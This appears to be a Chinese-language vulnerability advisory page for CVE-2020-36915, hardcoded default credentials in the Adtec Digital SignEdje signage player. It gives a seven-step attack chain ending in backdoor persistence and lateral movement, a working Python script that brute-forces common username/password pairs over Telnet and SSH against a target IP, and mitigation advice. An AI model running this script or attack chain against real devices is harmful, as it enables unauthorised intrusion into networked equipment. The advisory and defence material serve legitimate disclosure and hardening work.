CVE-2020-36915 | Adtec Digital SignEdje 硬编码默认凭证漏洞

漏洞信息

漏洞编号

CVE-2020-36915

漏洞类型

硬编码凭证/默认密码

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Adtec Digital SignEdje Digital Signage Player

漏洞概述

CVE-2020-36915是Adtec Digital SignEdje数字标牌播放器中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞源于软件中存在的多个硬编码默认凭证，这些凭证包括Web管理界面、Telnet和SSH服务的登录信息。由于这些凭证是硬编码在软件中的，攻击者可以通过公开渠道获取这些默认用户名和密码，从而无需任何身份验证即可远程访问受影响设备的系统管理功能。一旦成功利用，攻击者可以获取设备的root级别访问权限，进而执行任意系统命令，完全控制目标设备。此漏洞影响Adtec Digital旗下多个产品版本，存在于v2.08.28及可能更早的版本中。由于数字标牌设备通常部署在公共场所和企业网络中，攻击者利用此漏洞可能导致敏感数据泄露、服务中断或进一步的网络渗透攻击。

技术细节

该漏洞的根本原因是Adtec Digital SignEdje数字标牌播放器在软件开发和部署过程中使用了硬编码的默认凭证。这些默认凭证被嵌入到固件或应用程序代码中，用于Web管理界面、Telnet远程登录和SSH安全外壳服务。攻击者可以通过以下方式利用此漏洞：首先，通过端口扫描识别开放的管理端口（HTTP 80/443、Telnet 23、SSH 22）；其次，使用已知的默认凭证尝试登录各个服务；最后，成功登录后即可获得设备控制权限。由于CVSS向量显示无需认证（PR:N），攻击者无需获取任何先验知识即可发起攻击。获取访问权限后，攻击者可以执行系统命令、安装恶意软件或建立持久化后门。该漏洞的机密性影响为高（C:H），意味着攻击者可以访问设备上的敏感配置信息和数据。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者使用端口扫描工具（如Nmap）扫描目标设备，识别开放的Telnet（23）、SSH（22）和Web（80/443）端口

STEP 2

步骤2: 识别服务

通过服务指纹识别确认目标设备运行的是Adtec Digital SignEdje数字标牌播放器，并获取版本信息

STEP 3

步骤3: 凭证尝试

使用公开的硬编码默认凭证（admin/admin、root/root等）对识别出的服务进行暴力尝试登录

STEP 4

步骤4: 获取访问权限

成功登录后获得系统访问权限，此时攻击者已具备普通用户或管理员权限

STEP 5

步骤5: 权限提升

利用系统配置或已知漏洞将权限提升至root级别，获取完全系统控制权

STEP 6

步骤6: 持久化控制

植入后门程序或修改启动配置，确保即使设备重启也能维持持久化访问

STEP 7

步骤7: 横向移动

利用被入侵设备作为跳板，对内部网络中的其他设备发起进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2020-36915 PoC - Adtec Digital SignEdje Default Credentials
# Note: This is for educational and authorized testing purposes only

import socket
import sys
import telnetlib
from paramiko import SSHClient, AutoAddPolicy

def check_telnet_default_credentials(target_ip, port=23):
    """Check for default Telnet credentials"""
    default_creds = [
        ('admin', 'admin'),
        ('root', 'root'),
        ('admin', 'password'),
        ('root', 'password'),
        ('admin', '1234'),
        ('root', '12345')
    ]
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        result = sock.connect_ex((target_ip, port))
        
        if result == 0:
            print(f"[+] Telnet port {port} is open on {target_ip}")
            for username, password in default_creds:
                try:
                    tn = telnetlib.Telnet(target_ip, port, timeout=10)
                    tn.read_until(b'login: ', timeout=5)
                    tn.write(username.encode('ascii') + b'\n')
                    tn.read_until(b'Password: ', timeout=5)
                    tn.write(password.encode('ascii') + b'\n')
                    
                    result = tn.read_until(b'#', timeout=5)
                    if b'#' in result or b'$' in result:
                        print(f"[+] SUCCESS: Default credentials found - {username}:{password}")
                        return True
                except:
                    continue
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def check_ssh_default_credentials(target_ip, port=22):
    """Check for default SSH credentials"""
    default_creds = [
        ('admin', 'admin'),
        ('root', 'root'),
        ('admin', 'password')
    ]
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        result = sock.connect_ex((target_ip, port))
        
        if result == 0:
            print(f"[+] SSH port {port} is open on {target_ip}")
            for username, password in default_creds:
                try:
                    client = SSHClient()
                    client.set_missing_host_key_policy(AutoAddPolicy())
                    client.connect(target_ip, port=port, username=username, 
                                   password=password, timeout=10)
                    print(f"[+] SUCCESS: Default SSH credentials found - {username}:{password}")
                    return True
                except:
                    continue
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        print(f"Example: {sys.argv[0]} 192.168.1.100")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    print(f"[*] Scanning {target_ip} for CVE-2020-36915 vulnerability...")
    
    check_telnet_default_credentials(target_ip)
    check_ssh_default_credentials(target_ip)
    
    print("[*] Scan complete")

if __name__ == '__main__':
    main()

影响范围

Adtec Digital SignEdje Digital Signage Player v2.08.28及更早版本

其他Adtec Digital产品受影响的版本

防御指南

临时缓解措施

在厂商发布修复版本之前，应立即采取以下临时缓解措施：1）修改所有默认凭证为强随机密码；2）禁用Telnet服务，仅保留必要的SSH访问并使用密钥认证；3）配置网络防火墙，限制管理端口仅允许可信IP地址访问；4）启用详细的审计日志并定期审查；5）考虑使用VPN进行远程管理访问；6）监控设备网络流量，及时发现异常连接行为。